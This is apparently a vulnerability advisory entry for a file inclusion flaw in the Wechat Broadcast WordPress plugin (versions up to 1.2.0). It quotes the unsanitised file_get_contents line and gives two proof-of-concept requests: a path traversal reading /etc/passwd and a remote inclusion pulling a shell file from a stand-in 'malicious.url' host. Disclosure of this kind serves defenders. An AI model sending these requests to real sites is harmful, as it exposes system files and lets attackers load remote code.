Lucene search

K
wpexploitJonas LejonWPEX-ID:3E434618-087B-4EF9-A63B-8B378C748390
HistorySep 19, 2018 - 12:00 a.m.

Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion

2018-09-1900:00:00
Jonas Lejon
11

0.257 Low

EPSS

Percentile

96.7%

This bug was found in the file: /wechat-broadcast/wechat/Image.php echo file_get_contents(isset($_GET[“url”]) ? $_GET[“url”] : ‘’); The parameter “url” it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt

0.257 Low

EPSS

Percentile

96.7%